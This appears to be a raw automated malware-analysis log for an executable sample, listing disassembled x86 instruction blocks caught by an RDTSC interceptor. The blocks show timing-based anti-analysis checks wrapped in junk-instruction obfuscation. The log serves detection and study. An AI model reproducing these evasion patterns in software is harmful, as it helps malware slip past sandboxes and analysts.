Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD087C second address: 6FD08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a jmp 00007F61848348A9h 0x0000000f nop 0x00000010 jmp 00007F618483489Eh 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F618483489Ch 0x0000001f sub eax, 7F8EDE58h 0x00000025 jmp 00007F618483489Bh 0x0000002a popfd 0x0000002b pushfd 0x0000002c jmp 00007F61848348A8h 0x00000031 and ax, 68B8h 0x00000036 jmp 00007F618483489Bh 0x0000003b popfd 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD08FC second address: 6FD0914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0914 second address: 6FD093D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F61848348A5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD093D second address: 6FD09A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F6184CCBA87h 0x00000009 or ch, 0000003Eh 0x0000000c jmp 00007F6184CCBA89h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F6184CCBA80h 0x00000018 sbb esi, 48BD7238h 0x0000001e jmp 00007F6184CCBA7Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edx 0x00000026 pop eax 0x00000027 lea eax, dword ptr [ebp-10h] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d mov ecx, 15137181h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD09A6 second address: 6FD09D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, 6C1ABCF1h 0x0000000e popad 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F61848348A6h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD09D9 second address: 6FD09DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD09DD second address: 6FD09E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD09E3 second address: 6FD09F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA7Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD09F4 second address: 6FD0A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 5D79h 0x0000000e push eax 0x0000000f push edx 0x00000010 call 00007F61848348A4h 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0A19 second address: 6FD0A40 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6184CCBA7Bh 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6184CCBA81h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0A40 second address: 6FD0A55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0A55 second address: 6FD0A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0AAE second address: 6FD0ACA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61848348A8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0ACA second address: 6FD0B15 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov edi, eax 0x0000000d jmp 00007F6184CCBA86h 0x00000012 test edi, edi 0x00000014 pushad 0x00000015 mov si, 3E2Dh 0x00000019 mov ah, 90h 0x0000001b popad 0x0000001c js 00007F61F362A63Ch 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F6184CCBA80h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0CCB second address: 6FD0CFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61848348A3h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F61848348A5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0CFD second address: 6FD0D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D03 second address: 6FD0D07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D07 second address: 6FD0D0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D0B second address: 6FD0D5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F61F319323Ch 0x0000000e jmp 00007F618483489Fh 0x00000013 mov eax, dword ptr [ebp-04h] 0x00000016 jmp 00007F61848348A6h 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F61848348A7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D5D second address: 6FD0D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6184CCBA84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D75 second address: 6FD0D79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0D79 second address: 6FD0DEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebx+70h] 0x0000000b jmp 00007F6184CCBA87h 0x00000010 push 00000001h 0x00000012 pushad 0x00000013 mov cl, 51h 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F6184CCBA7Ch 0x0000001c or ax, B4B8h 0x00000021 jmp 00007F6184CCBA7Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 popad 0x00000029 push esi 0x0000002a pushad 0x0000002b push eax 0x0000002c mov cx, di 0x0000002f pop ebx 0x00000030 pushfd 0x00000031 jmp 00007F6184CCBA7Ah 0x00000036 or ch, 00000018h 0x00000039 jmp 00007F6184CCBA7Bh 0x0000003e popfd 0x0000003f popad 0x00000040 mov dword ptr [esp], eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0DEC second address: 6FD0DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0DF0 second address: 6FD0DF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0DF4 second address: 6FD0DFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0DFA second address: 6FD0E22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-18h] 0x0000000c jmp 00007F6184CCBA80h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0E22 second address: 6FD0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0E26 second address: 6FD0E2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0E2C second address: 6FD0E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F618483489Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0E3B second address: 6FD0E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0ED2 second address: 6FD0ED8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0ED8 second address: 6FD0EDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0EDE second address: 6FD0EE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0EE2 second address: 6FD0EF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0EF2 second address: 6FD0EF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0EF6 second address: 6FD0EFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0EFC second address: 6FD0F7D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 jmp 00007F61848348A2h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d test edi, edi 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F618483489Eh 0x00000016 add al, 00000018h 0x00000019 jmp 00007F618483489Bh 0x0000001e popfd 0x0000001f jmp 00007F61848348A8h 0x00000024 popad 0x00000025 js 00007F61F3192FF5h 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F618483489Dh 0x00000034 and ah, 00000066h 0x00000037 jmp 00007F61848348A1h 0x0000003c popfd 0x0000003d popad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0F7D second address: 6FD0FA3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebp-14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov bl, cl 0x00000012 jmp 00007F6184CCBA83h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD0FA3 second address: 6FD105B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b jmp 00007F618483489Eh 0x00000010 mov dword ptr [esi+0Ch], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F618483489Dh 0x0000001a jmp 00007F618483489Bh 0x0000001f popfd 0x00000020 popad 0x00000021 mov edx, 759B06ECh 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F61848348A4h 0x0000002d jmp 00007F61848348A5h 0x00000032 popfd 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007F618483489Eh 0x0000003a adc si, DAB8h 0x0000003f jmp 00007F618483489Bh 0x00000044 popfd 0x00000045 mov esi, 26EA62EFh 0x0000004a popad 0x0000004b popad 0x0000004c sub eax, eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007F618483489Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD105B second address: 6FD1070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1070 second address: 6FD1076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1076 second address: 6FD107A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD107A second address: 6FD10A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lock cmpxchg dword ptr [edx], ecx 0x0000000c jmp 00007F618483489Fh 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov si, dx 0x00000018 mov dx, 5DF2h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD10A1 second address: 6FD10A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD10A7 second address: 6FD114B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 popad 0x00000013 jne 00007F61F3192EABh 0x00000019 jmp 00007F61848348A5h 0x0000001e mov edx, dword ptr [ebp+08h] 0x00000021 pushad 0x00000022 mov bx, ax 0x00000025 mov ecx, 7FC5ED5Fh 0x0000002a popad 0x0000002b mov eax, dword ptr [esi] 0x0000002d pushad 0x0000002e mov edi, eax 0x00000030 movzx eax, dx 0x00000033 popad 0x00000034 mov dword ptr [edx], eax 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007F61848348A5h 0x0000003d sbb ecx, 0E2D7436h 0x00000043 jmp 00007F61848348A1h 0x00000048 popfd 0x00000049 mov dl, ah 0x0000004b popad 0x0000004c mov eax, dword ptr [esi+04h] 0x0000004f jmp 00007F61848348A3h 0x00000054 mov dword ptr [edx+04h], eax 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b pushad 0x0000005c popad 0x0000005d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD114B second address: 6FD1166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1166 second address: 6FD118C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD118C second address: 6FD1190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1190 second address: 6FD11A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F618483489Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11A3 second address: 6FD11DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+08h], eax 0x0000000c jmp 00007F6184CCBA7Eh 0x00000011 mov eax, dword ptr [esi+0Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11DA second address: 6FD11DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11DE second address: 6FD11E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11E4 second address: 6FD11EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11EA second address: 6FD11EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD11EE second address: 6FD1200 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1200 second address: 6FD1205 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1205 second address: 6FD1260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F618483489Ch 0x00000009 jmp 00007F61848348A5h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F61848348A0h 0x00000015 jmp 00007F61848348A5h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov eax, dword ptr [esi+10h] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 mov al, bh 0x00000026 mov dh, al 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1260 second address: 6FD1266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1266 second address: 6FD126A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD126A second address: 6FD12A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA88h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F6184CCBA87h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD12A4 second address: 6FD12F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F61848348A3h 0x00000014 pop esi 0x00000015 jmp 00007F61848348A9h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD12F5 second address: 6FD12FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD12FB second address: 6FD12FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD12FF second address: 6FD1321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1321 second address: 6FD1325 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1325 second address: 6FD1340 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6184CCBA87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1340 second address: 6FD1365 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+18h] 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1365 second address: 6FD1369 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1369 second address: 6FD13B9 instructions: 0x00000000 rdtsc 0x00000002 mov bh, ah 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov edx, 13FCC3C8h 0x0000000b popad 0x0000000c mov dword ptr [edx+18h], eax 0x0000000f pushad 0x00000010 call 00007F618483489Dh 0x00000015 pushfd 0x00000016 jmp 00007F61848348A0h 0x0000001b sub ch, 00000028h 0x0000001e jmp 00007F618483489Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 call 00007F618483489Fh 0x0000002c pop ecx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD13B9 second address: 6FD13E6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esi+1Ch] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushfd 0x00000010 jmp 00007F6184CCBA7Ah 0x00000015 or esi, 1F4613B8h 0x0000001b jmp 00007F6184CCBA7Bh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD13E6 second address: 6FD1430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61848348A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c jmp 00007F618483489Eh 0x00000011 mov eax, dword ptr [esi+20h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F61848348A7h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1430 second address: 6FD1436 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD1436 second address: 6FD143A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD143A second address: 6FD148A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+20h], eax 0x0000000b jmp 00007F6184CCBA87h 0x00000010 mov eax, dword ptr [esi+24h] 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F6184CCBA7Bh 0x0000001a jmp 00007F6184CCBA83h 0x0000001f popfd 0x00000020 popad 0x00000021 mov dword ptr [edx+24h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\f9bcOz8SxR.exeRDTSC instruction interceptor: First address: 6FD148A second address: 6FD148E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
